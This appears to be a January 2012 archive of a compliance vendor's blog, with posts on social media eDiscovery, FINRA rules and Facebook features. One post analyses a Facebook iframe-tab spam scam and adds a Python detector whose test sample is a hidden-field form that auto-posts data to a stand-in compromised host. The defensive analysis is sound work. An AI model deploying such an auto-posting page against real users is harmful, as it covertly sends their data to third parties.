Monthly Archives: January 2012

Let’s not forget social media in discovery strategies

By nleong,   January 25, 2012

Up until very recently, social media eDiscovery was often overlooked (or just plain ignored) by law firms and organizations alike.  That’s changing though.  With an increase in case law emerging on social media issues, it was inevitable that the legal community would start to incorporate social media communications into their discovery strategies.

The recent sanction of an attorney in Virginia underscored the importance courts now place on proper discovery of social media content.  At the end of the day, social media is just another form of electronic communication, much along the lines of email and instant messaging.  It’s the content that matters, not the communication channel.  In fact, whether it’s for corporate governance, regulatory, or eDiscovery purposes, the identification and collection of social media content is absolutely critical.

I’m excited to present at LegalTech New York this year.  Social is on everyone’s minds.  Case law is growing on the topic.  And technology is keeping pace.  In addition to speaking in New York, I’ll also be hosting a regular webinar on social media eDiscovery.  We’ll be hosting our first Social Media eDiscovery webinar on February 8th at 11am PT, so we encourage you to sign up and find out what your organization should be doing with respect to social and what tools are available to facilitate the discovery process.

Social’s not going anywhere, so it’s best to be prepared if the courts get involved….

Facebook Page Spam: Misuse of “Static html: iframe tabs”

By actiance,   January 24, 2012

Facebook has connected millions of people around the world.  The social connector has become not only a medium for sharing but also a platform for third parties to nurture their businesses based on applications and games.  Facebook pages, in addition, let users advertise their businesses to people across the globe.  Facebook pages (sponsored stories and ads) have become one of the best ways to spread the word about a business.

Popularity has its own side effects.  The useful Facebook pages and applications have been misused by spammers, and the innocent public has to suffer.  We came across a Facebook Page scam that was misusing the static html: iframe tabs to trick users.

The spammer creates a Facebook page:

When a user comes across this page, “Loading” is displayed and then the page redirects to a pop-up.  The redirection here is done using Facebook static html: iframe tabs.  This is a useful tool that lets Facebook application developers build iframe tabs for pages.

The network traffic suggests

A useful Facebook application is being used here for malicious purposes by the spammer.

It is evident from the code (see Image1) that a redirection is happening to ‘’ using the HTTP POST method.  Spammers are using the domain, adding a subdirectory, ‘’, and then a further redirection happens (see Image2).


Like ‘,’ ‘’ is also compromised and being used for further redirection to pop-ups, adding a subdirectory ‘’, and here again encrypted information is sent to a compromised server using the HTTP POST method.


See Image3 for the initial pop-up that is brought up using the domains (,,, etc.)


If you are not from the U.S., the pop-up will further redirect you to another pop-up specifically for you (see Image4).


Eventually, the user is led to an ad page that looks similar to Image5.


If you are not from the U.S., then you are led to an ad page that looks similar to Image6.  It strengthens the idea that the spammer is using local servers based on territory to render ad pages.


The page makes it appear as if you are the luckiest person on earth.  That is when the spammers ask for personally identifiable information, such as your e-mail address, zip code, mobile number, and other basic information.

The notable thing here is that the spammer is navigating pages using the single iframe URL.

Intention of attack

I have not experienced anything wrong with my Facebook account after observing the spam page. However, I’m concerned about the encrypted data that was sent to compromised servers.  The user’s e-mail address and mobile numbers could also be used for future spamming.

This type of spam is a warning sign:  Facebook users and third-party application developers alike must be on the lookout for similar pages used to trick innocent users.
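
A check for the pattern described in this post, as an added example that is not code from the original post or from Facebook: it scans the HTML served inside an iframe tab for a form that is auto-submitted by script via HTTP POST to a host outside the tab's own domain.  The post only states that the redirect uses POST; the auto-submitting form, the hostnames, and both sample documents are constructed assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class TabScanner(HTMLParser):
    """Collects forms, their hidden fields, and all inline script text."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self.scripts = []          # <script> bodies and on* handler values
        self._form = None
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._form = {"method": a.get("method", "get").lower(),
                          "action": a.get("action", ""),
                          "hidden_fields": []}
            self.forms.append(self._form)
        elif tag == "input" and self._form and a.get("type", "").lower() == "hidden":
            self._form["hidden_fields"].append(a.get("name", ""))
        elif tag == "script":
            self._in_script = True
        # Event handlers such as <body onload="..."> can also trigger the submit.
        self.scripts.extend(v for k, v in a.items() if k.startswith("on"))

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def find_auto_post_redirects(tab_html, trusted_hosts):
    """Return POST forms that script submits to a host outside trusted_hosts."""
    scanner = TabScanner()
    scanner.feed(tab_html)
    auto_submit = any(re.search(r"\.submit\s*\(", s) for s in scanner.scripts)
    findings = []
    for form in scanner.forms:
        host = urlparse(form["action"]).hostname   # None for relative actions
        off_site = host is not None and not any(
            host == t or host.endswith("." + t) for t in trusted_hosts)
        if form["method"] == "post" and off_site and auto_submit:
            findings.append({"action_host": host,
                             "hidden_fields": form["hidden_fields"]})
    return findings


# Constructed samples: a "Loading" tab that posts off-site, and a normal form.
SPAM_TAB = """<html><body onload="document.forms[0].submit()"><p>Loading</p>
<form method="POST" action="http://compromised.example/subdir/">
<input type="hidden" name="data" value="QUJDREVG"></form></body></html>"""
BENIGN_TAB = """<html><body><script>console.log('ready')</script>
<form method="post" action="/subscribe"><input type="text" name="email">
<input type="submit" value="Join"></form></body></html>"""

if __name__ == "__main__":
    print(find_auto_post_redirects(SPAM_TAB, ["tabs.example.org"]))
    print(find_auto_post_redirects(BENIGN_TAB, ["tabs.example.org"]))
```

The hidden field names in each finding show what is being carried to the off-site host, which is the part of this scam the post flags as the main concern.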

Social media eDiscovery Webinar

By Sarah Carter,  

It’s a new year, yet the social media train continues along its tracks.  As social becomes further ingrained in our daily lives, both personally and professionally, the legal community is quickly realizing that social media cannot be ignored for eDiscovery.  Increasingly, we’re seeing more lawsuits that are social media-related.  Although it’s a still-evolving area of law, the body of case law is steadily growing.

Actiance is excited to announce a new webinar series focused on social media eDiscovery.  You’ll learn about eDiscovery basics and what’s driving corporations and law firms alike to think seriously about their social media strategies.  We’ll discuss some of the key drivers for social media discovery and the technology solutions available to capture this type of content.

Our very own Norv Leong will be delivering the webinar.  He’s a licensed member of the California Bar and is also the author of the Actiance white paper, “Social Media and Litigation:  Outlining eDiscovery Issues.”  He’ll bring to bear his twelve years of experience in the technology and legal sectors to educate you on the key issues of social media eDiscovery and to share his insights on an effective social discovery strategy.

We believe that social cannot be overlooked for any organization’s overall discovery strategy, so please join us on February 8th at 11am PT to find out why. Register at

Belbey Blogs: Rick Ketchum, Chairman of FINRA, Highlights FINRA Exam Priorities for 2012

By Joanna Belbey,   January 19, 2012

At the SIFMA Compliance and Legal Monthly Luncheon held at the Harvard Club in New York on January 17, Richard Ketchum, Chairman and Chief Executive Officer of FINRA, outlined exam priorities for 2012.

Mr. Ketchum acknowledged that these difficult markets, the search for yield, and the changing regulatory landscape due to the implementation of Dodd Frank can place “tremendous pressures” on firms, clients, and Compliance departments.  But, at the end of the day, the mission of FINRA is to protect investors.  He stated that he hoped that his remarks before the group of mostly attorneys and other compliance professionals would “get your blood running, if not running cold,” as he encouraged everyone to “step up” to meet compliance challenges and respond in an honest way to the lessons we’ve learned over the last few years.

In the next few weeks, FINRA will release its Annual Exam Priority Letter.  The following are a few advance highlights:

Complex Products – Heightened supervision is required with enhanced compliance procedures to ensure that reps, supervisors, and retail investors understand complex products.  See Regulatory Notice 12-03 for details.

Supervision – Firms must demonstrate responsibility for all business lines they engage in, in spite of increased difficulty, complexity, and customer frustrations with return on investments.  Firms must demonstrate proper supervision.

Suitability – Changes to FINRA “Know your customer” Suitability rules are going into effect July 9th.  Examiners will review the steps firms are taking to prepare for changes and implementation once rules are in effect.  See Regulatory Notice 11-25 for details.

Data Security – In light of sophisticated attacks against firms, FINRA is looking for equally significant defenses, including attention to emerging markets.

Social Media – FINRA has issued two notices, Regulatory Notice 10-06 Guidance on Blogs and Social Networking Web Sites and Regulatory Notice 11-39 Guidance on Social Networking Websites and Business Communications.  Examiners will focus on the supervision and recordkeeping of all business communications, regardless of device; the pre-approval of static content; supervision of interactive content on a risk basis; and the adoption and entanglement of third-party content resulting in a firm being responsible for that content.  Furthermore, FINRA examiners will check whether a registered principal of the firm has reviewed social media sites before they are launched; if there are links to third-party sites with false or misleading content; that firms have established policies to ensure the accuracy of third-party data feeds; and when firms allow the use of personal devices, they must demonstrate the ability to supervise and keep records of those business communications.

Mr. Ketchum noted that FINRA welcomes continued feedback from the industry on any and all issues and is looking forward to a three-way conversation, specifically about social media, among FINRA, the industry, and the SEC, which sets so many of the record-keeping requirements in the industry.

So, watch for FINRA’s Annual Exam Priority Letter soon and continue to take a careful look at how your firm is complying with FINRA rules, including following FINRA’s guidance on social media.  And consider writing a letter to Mr. Ketchum and FINRA to share your key learnings as you begin to deploy social media within your enterprise.

Feeling the emotion with Facebook Music

By actiance,   January 18, 2012

Music – the true sense of sharing

Millions of people have been using the services of the social giant Facebook to connect and share with others across the globe.  Facebook has connected people through features such as wall updates, photos, videos, chat, etc.  These features have helped folks make connections worldwide, and eventually, build up a huge network of friends.  Although users receive several notifications from others commenting on and liking their posts, photos, videos, etc., it has never really created a sense of “closeness” among people.

One may find many friends available to chat online, but then why is it that they rarely, if ever, chat?  It could be that they have nothing to say or don’t really know each other (just because you’re “Facebook friends” doesn’t necessarily mean you’re “friends friends,” right?).

Perhaps Facebook has realized that, even though they’re providing a platform on which to connect and share, it isn’t enough to actually bring people closer together emotionally.  Additional effort is needed to truly connect people on an emotional level, which opens up a whole new ballgame for sharing.  And what could be more powerful than music?

Music evokes a range of emotions – from pain to euphoria.  It doesn’t matter if you’re in the US, Europe, India, Asia, Australia…the world over loves music and oftentimes relies on it to lift one’s spirits when feeling down or in need of that adrenalin rush just before a sporting event, an important exam, or before proposing to your sweetheart.  It’s essentially a medium through which to share your innermost feelings – a more powerful and purer type of “sharing” than, say, the sharing of forced-smile photos or contrived/stolen wall updates.

Music is from the heart and represents Facebook’s next foray into the next dimension of sharing.  It could very well end up being an avenue for users to spend even more time on Facebook.

Partial rollout of Facebook Music

Users can find the “Music” tab under the “Apps” category on the home page, or here.

The page lists a number of trending albums.  The user can view artist names, album titles, and third-party music providers (e.g., Spotify, MySpace, Saavn).  When a user clicks on a song, a pop-up window appears that prompts the user to add the specific provider’s app, after which the user is directed to that provider’s site.  And because the pop-up here is not really a Facebook application, but rather, a redirection to a third-party page, it is not asking for any user information like other Facebook applications.

This partial rollout confirms that Facebook will not directly host or stream any music content and that it will rely on third-party providers to do so.  Facebook’s plan is to become a platform for music content in the same way it’s a platform for apps and games.  This contrasts with Google and Apple’s strategies of hosting music on their own servers.

Whispers are circulating that Facebook might go beyond Music.  For instance, Netflix could stream movies through Facebook or there could be an application that uploads music to the cloud.  The possibilities are endless.

Right now, though, I’m just anxiously awaiting the complete rollout of Facebook Music so that I can listen to music with my friends and share real emotions.

Actiance and IBM: Enabling Social Business

By nleong,   January 17, 2012

Most of the Actiance team is off at Lotusphere this week – and while I expect a few of them will be sneaking away from the show floor early to visit the “Magic Kingdom,” I’ve been left to captain the ‘blogging ship’ as it were.  So, as a nod to the Actiance team at Lotusphere and to longtime Actiance partner, IBM, I wanted to write about some great news for IBM Connections users and Actiance customers.

At the event, Actiance is showcasing the result of a partnership with IBM – Vantage for IBM Connections.

When most people think about what the term “social business” means, they typically don’t think regulatory compliance and eDiscovery.  But, businesses moving into social face increased regulatory compliance requirements.  Add in the requirement that social content needs to be discoverable and suddenly the internal IT team is in over its head trying to make social business work.

That’s why Actiance has partnered with IBM to make it easier for IBM customers to adopt social collaboration tools.  IBM customers can now access Vantage Compliance support for IBM Connections and IBM Sametime through the IBM Passport Advantage (PPA).

Vantage for IBM Connections provides a centralized governance, management, and security policy framework to ensure compliant, discoverable social content (it also allows granular policies to be defined between end users, groups of employees, and even non-employees).

I know the team is excited to showcase our new Vantage for IBM Connections compliance module (available exclusively through IBM) at Lotusphere this year.  We’ve already seen a tremendous amount of interest in the module from customers looking to better enforce corporate use policies and enable collaboration.

If you’re attending Lotusphere this year, please stop by Actiance booth #521 – we’d love to hear about what your organization is doing to enable social business.  If you have questions about Vantage for IBM Connections – let us know in the comments section below – we always enjoy talking social business!

Belbey Blogs: FINRA is NOT backing off social media

By Joanna Belbey,   January 6, 2012

In recent weeks, there has been some confusion about FINRA’s stance on social media.  Between one source and another, it seems as if there’s a general feeling that FINRA is “backing off” from social media.  We don’t agree.  We’re going to attempt to clarify FINRA’s position, but first, some context.

Since the consolidation of NASD and the regulatory function of NYSE in 2007, the newly established entity, FINRA, has worked towards creating a new, consolidated FINRA Rulebook.  The goal is to harmonize and streamline existing rules (from NYSE and NASD), adapt to the changes in the securities industry, and create a set of rules that are flexible enough to be used across different types of firms regulated by FINRA.

As FINRA has clearly stated that social media is just another form of electronic communications and should be treated as such, firms are closely watching FINRA’s progress on the consolidation of rules that impact social media, such as supervision, bookkeeping, and communications.

In July 2011, FINRA filed proposed changes to Communications with the Public rules with the Securities Exchange Commission.  Since then, there have been two rounds of comments from the industry with FINRA submitting the final proposal for changes on December 22, 2011, to the SEC.  The SEC is accepting comments from the industry until January 18, 2012, and will comment on the proposed rule sometime after that.

The issue that has everyone talking within social media circles begins on page 10 of the December 22nd letter.  The current NASD Rule 2210 specifies six types of communications, with different regulatory requirements for each.  One category, “Public Appearance,” used for “participation in a seminar, forum (including an electronic forum), radio or television interview” was where FINRA originally classified interactive posts on social media.  That meant that firms were responsible for supervising such activities to ensure compliance with content standards and maintain appropriate records but were not required to file these posts with the FINRA Advertising Department.  (A sidenote for those of you unfamiliar with the regulatory process:  depending on how they are categorized, certain advertising and sales literature materials need to be both pre-approved by a registered principal of a firm and then sent to FINRA for review and approval.)

Under the new rule, however, FINRA Rule 2210 would be streamlined to have only three categories of communications and “Public appearance” would no longer be a separate category under communications.  Instead, FINRA has proposed categorizing social media as “Retail Communications,” which has a different set of regulatory requirements.  When the industry expressed concern that this would make using social media overly complicated for firms, FINRA specifically excluded posts on online interactive electronic forums from filing requirements.

However, it’s important to note that although social media may not be subject to filing requirements with the proposed rule, firms still need to ensure compliance with content standards and bookkeeping requirements like any other written communications.  That means that social media communications need to be captured, supervised, archived, and made available upon request.  Filing is not archiving after all, and a number of folks appear to have been confusing the two terms.

Backing off social media?  We don’t think so, especially when the SEC issues two alerts and charges a firm with fraudulent use of LinkedIn in one day.  In fact, we think that the regulators will pay close attention to the use of social media in the coming year to demonstrate their commitment to protecting investors.

Are you ready?  We’re certainly standing by.  In fact, we’re planning on putting on a webinar once FINRA 2210 is finalized, so watch this space for details.  And feel free to contact us if you’d like to chat about your specific social media concerns in the meantime.

The insurance industry getting socially savvy

By nleong,   January 4, 2012

In looking back at 2011, the insurance industry was quite active on the social media front.  Firms of all sizes hopped on the social bandwagon.  From cavemen to ducks to Aaron Rodgers, marketing folks at insurance companies (both P&C and, to a lesser extent, life/health) were hard at work trying to engage with prospects and customers via social.  A study by SocialEyes revealed much about the state of the industry in its effort to exploit the benefits of this new marketing channel.

As social takes on a more strategic role in insurance firms (as opposed to a novelty), many firms (especially those that weren’t early adopters of social) are turning to marketing agencies for help in developing strategies and campaigns to lure new customers.  Central to any strategy is to create value in the content being posted to social networks like Facebook, LinkedIn, and Twitter.  With compelling content comes a higher likelihood of increased engagement with a particular prospect or customer.  This is why finding a top-notch marketing agency is so difficult:  it’s not as easy as you might think to find an agency well-versed in social but also possessing the domain expertise crucial to building impactful Facebook pages.

The nice thing about social is that it allows for much creativity.  For instance, 21st Century Insurance tripled its fanbase in just five months, running weekly sweepstakes with prizes like Macbooks.  Similarly, State Farm (in conjunction with its Aaron Rodgers ‘dance-off’ campaign) dangled a trip to the Super Bowl through its social media pages.  And finally, MetLife, leveraging its association with the Peanuts gang (Snoopy!!), noticed a higher level of interaction among its followers when an image of a Peanuts character was used, rather than no image at all.

In fact, when you see which firms are having the most success with social, it’s those firms that have between 10,000 and 100,000 Facebook friends, according to SocialEyes.  Firms in this segment are growing the fastest and tend to have enough resources, both internal and agency, to effectively leverage social.  The firms with more than a million fans tend to be focused on brand-building and not as interested in developing a meaningful dialogue.  Hence, pages with smaller fan counts tend to have higher rates of customer interactions, i.e., more sharing and commenting of content posted.

Interestingly, when it comes to Facebook page types, it was the product-focused pages that saw the fastest growth, not the mascot-type pages (think Aflac Duck, GEICO Caveman, Progressive “Discount!” Girl).  But, the catch here is that firms must work hard to keep the pages relevant and “sticky.”  Building a relationship with customers via social requires commitment and content on the part of the insurance provider.  Already, we’ve seen GEICO shift focus away from its motorcycle and RV product pages to other products.  Like most things social, it’s about responding to market dynamics and providing content “we the people” want to see.

On the Twitter front, insurance companies with more than 10,000 followers were the fastest growing segment, tweeting 3.5x as much as the firms with less than 1,000 followers.  Perhaps a combination of more resources plus the increased use of promoted tweets accounts for the delta between these two segments.  And then there’s the creative GEICO Gecko campaign that utilizes a multi-channel approach, i.e., leveraging both Facebook and Twitter, as consumers can track the Gecko’s journey across the US.  Through this integrated campaign, the number of Twitter followers has increased by 66%.

So, whether it’s cavemen, ducks, or geckos, insurance firms are using social in innovative ways.  Results can vary, but those who put in the effort per a carefully conceived strategy have been (and will continue to be) the ones reaping the most benefits.  At the end of the day, though, creating an experience that provides value to the consumer will ultimately be the measuring stick of a firm’s social strategy.